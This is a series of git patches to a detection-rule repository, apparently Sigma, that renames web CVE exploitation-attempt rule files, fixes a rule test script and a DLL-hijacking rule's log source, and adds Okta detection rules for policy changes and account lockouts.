rules/web/{web_cve-2010-1955_exploitation_attempt.yaml => web_cve-2010-1955_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1956_exploitation_attempt.yaml => web_cve-2010-1956_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1979_exploitation_attempt.yaml => web_cve-2010-1979_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1980_exploitation_attempt.yaml => web_cve-2010-1980_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1981_exploitation_attempt.yaml => web_cve-2010-1981_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1983_exploitation_attempt.yaml => web_cve-2010-1983_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2033_exploitation_attempt.yaml => web_cve-2010-2033_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2034_exploitation_attempt.yaml => web_cve-2010-2034_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2035_exploitation_attempt.yaml => web_cve-2010-2035_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2036_exploitation_attempt.yaml => web_cve-2010-2036_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2122_exploitation_attempt.yaml => web_cve-2010-2122_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2259_exploitation_attempt.yaml => web_cve-2010-2259_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2307_exploitation_attempt.yaml => web_cve-2010-2307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2682_exploitation_attempt.yaml => web_cve-2010-2682_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2861_exploitation_attempt.yaml => web_cve-2010-2861_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2920_exploitation_attempt.yaml => web_cve-2010-2920_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-3426_exploitation_attempt.yaml => web_cve-2010-3426_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-4231_exploitation_attempt.yaml => web_cve-2010-4231_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-4617_exploitation_attempt.yaml => web_cve-2010-4617_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-5278_exploitation_attempt.yaml => web_cve-2010-5278_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0943_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0943_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0944_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0944_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-0985_exploitation_attempt.yaml rename to rules/web/web_cve-2010-0985_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1219_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1219_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1304_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1304_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1305_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1305_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1306_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1306_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1307_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1308_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1308_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1312_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1312_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1313_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1313_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1314_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1314_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1345_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1345_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1353_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1353_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1354_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1354_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1470_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1470_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1471_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1471_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1472_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1472_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1473_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1473_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1474_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1474_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1475_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1475_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1476_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1476_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1494_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1494_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1495_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1495_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1532_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1532_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1533_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1533_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1534_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1534_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1535_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1535_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1601_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1601_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1602_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1602_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1607_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1607_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1657_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1657_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1659_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1659_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1714_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1714_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1717_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1717_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1718_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1718_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1719_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1719_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1722_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1722_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1875_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1875_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1953_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1953_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1954_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1954_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1955_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1955_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1956_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1956_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1979_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1979_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1980_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1980_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1981_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1981_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1983_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1983_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2033_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2033_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2034_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2034_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2035_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2035_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2036_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2036_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2122_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2122_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2259_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2259_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2307_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2682_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2682_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2861_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2861_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2920_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2920_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-3426_exploitation_attempt.yaml rename to rules/web/web_cve-2010-3426_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4231_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4231_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4617_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4617_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-5278_exploitation_attempt.yaml rename to rules/web/web_cve-2010-5278_exploitation_attempt.yml From 3c0c1706dcc745934cae3076815cf482b4dfa83f Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 23:06:01 +0530 Subject: [PATCH 0889/1367] Changed --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index bbb1219f..1fecf839 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -15,7 +15,7 @@ tags: - attack.defense_evasion - attack.t1574.001 logsource: - service: sysmon + service: file_event product: windows detection: selection: From 0c092cd1064b997eff6de5e377479d6b76f62c24 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 23:11:46 +0530 Subject: [PATCH 0890/1367] Final changes --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 1fecf839..702dcf29 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -15,7 +15,7 @@ tags: - attack.defense_evasion - attack.t1574.001 logsource: - service: file_event + category: file_event product: windows detection: selection: From e6d4cb15bd14dd967d53993abf86cbd4d95b4c34 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 12 Sep 2021 20:04:58 +0200 Subject: [PATCH 0891/1367] fix NoneType error --- tests/test_rules.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 9cfd82c0..045268f5 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -585,6 +585,10 @@ class TestRules(unittest.TestCase): ] for file in self.yield_next_rule_file_path(self.path_to_rules): logsource = self.get_rule_part(file_path=file, part_name="logsource") + if not logsource: + print(Fore.RED + "Rule {} has no 'logsource'.".format(file)) + faulty_rules.append(file) + continue valid = True for key in logsource: if key.lower() not in valid_logsource: From 29490f350d7c8ff26205f6517d305d45c9134e8e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 12 Sep 2021 20:13:58 +0200 Subject: [PATCH 0892/1367] fix NoneType object has no attribute get --- tests/test_rules.py | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 045268f5..d4f2e0ef 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -308,16 +308,17 @@ class TestRules(unittest.TestCase): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): logsource = self.get_rule_part(file_path=file, part_name="logsource") - service = logsource.get('service', '') - if service.lower() == 'sysmon': - with open(file,encoding='utf-8') as f: - found = False - for line in f: - if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines - found = True - break - if not found: - faulty_rules.append(file) + if logsource: + service = logsource.get('service', '') + if service.lower() == 'sysmon': + with open(file,encoding='utf-8') as f: + found = False + for line in f: + if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines + found = True + break + if not found: + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using sysmon events but with no EventID specified") From 0d51178174a7c81a288dc571b5a9673f3f0f71f2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:13:15 -0500 Subject: [PATCH 0893/1367] Create okta_policy_modified_or_deleted.yml --- .../okta/okta_policy_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/okta/okta_policy_modified_or_deleted.yml diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml new file mode 100644 index 00000000..494af5b5 --- /dev/null +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Policy Modified or Deleted +id: 1667a172-ed4c-463c-9969-efd92195319a +description: Detects when an Okta policy is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + displaymessge: + - policy.lifecycle.update + - policy.lifecycle.delete + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Okta Policies being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ebd120a16507db1f5e745fa575e7b6be8f43e5bf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:17:00 -0500 Subject: [PATCH 0894/1367] Create okta_application_modified_or_deleted.yml --- rules/cloud/okta/okta_application_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_application_modified_or_deleted.yml diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -0,0 +1 @@ +NOT READY YET From 76d78c274ae31ffb18ea312f973830b9ddf93bb0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:17:25 -0500 Subject: [PATCH 0895/1367] Create okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -0,0 +1 @@ +NOT READY YET From fefb8564717d69af72ededb4172bc7ec00aac734 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:20:54 -0500 Subject: [PATCH 0896/1367] Create okta_account_mfa_reset.yml --- rules/cloud/okta/okta_account_mfa_reset.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_account_mfa_reset.yml diff --git a/rules/cloud/okta/okta_account_mfa_reset.yml b/rules/cloud/okta/okta_account_mfa_reset.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_account_mfa_reset.yml @@ -0,0 +1 @@ +NOT READY YET From c51e1db2288c58a7637df6647672c35ae01744cf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:22:15 -0500 Subject: [PATCH 0897/1367] Create okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml new file mode 100644 index 00000000..c3b70785 --- /dev/null +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -0,0 +1 @@ +NOT READ YET From d5653cbfd0b7f6fda9467f5a92f1cbf4f90dfdea Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:24:57 -0500 Subject: [PATCH 0898/1367] Create okta_user_account_mfa_bypass_attempt.yml --- rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml @@ -0,0 +1 @@ +NOT READY YET From 1af9120f3771e54bfe753124347255270c8671b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:25:11 -0500 Subject: [PATCH 0899/1367] Rename okta_account_mfa_reset.yml to okta_user_account_mfa_reset.yml --- ...okta_account_mfa_reset.yml => okta_user_account_mfa_reset.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/okta/{okta_account_mfa_reset.yml => okta_user_account_mfa_reset.yml} (100%) diff --git a/rules/cloud/okta/okta_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml similarity index 100% rename from rules/cloud/okta/okta_account_mfa_reset.yml rename to rules/cloud/okta/okta_user_account_mfa_reset.yml From 12e5eeac9ecb3e5d4e2243e9b2c829ca331c609f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:30:03 -0500 Subject: [PATCH 0900/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 494af5b5..2e72accd 100644 --- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -11,7 +11,7 @@ logsource: service: okta detection: selection: - displaymessge: + eventtype: - policy.lifecycle.update - policy.lifecycle.delete condition: selection From 8607af29e0f2322d2ae1f2c35841c935c0b1976a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:35:19 -0500 Subject: [PATCH 0901/1367] Create okta_user_account_lockout.yml --- .../cloud/okta/okta_user_account_lockout.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 rules/cloud/okta/okta_user_account_lockout.yml diff --git a/rules/cloud/okta/okta_user_account_lockout.yml b/rules/cloud/okta/okta_user_account_lockout.yml new file mode 100644 index 00000000..92fd1081 --- /dev/null +++ b/rules/cloud/okta/okta_user_account_lockout.yml @@ -0,0 +1,20 @@ +title: Okta User Account Lock out +id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a +description: Detects when an user account is locked out. +author: Austin Songer +status: experimental +date: 2021/09/12 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + displaymessage: Max sign in attempts exceeded + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown From 8b0756bd32f7c1ab9da0a0d3b798c3d6806fa649 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:39:24 -0500 Subject: [PATCH 0902/1367] Create okta_unauthorized_access_to_app.yml --- .../okta/okta_unauthorized_access_to_app.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/okta/okta_unauthorized_access_to_app.yml diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml new file mode 100644 index 00000000..f0045b70 --- /dev/null +++ 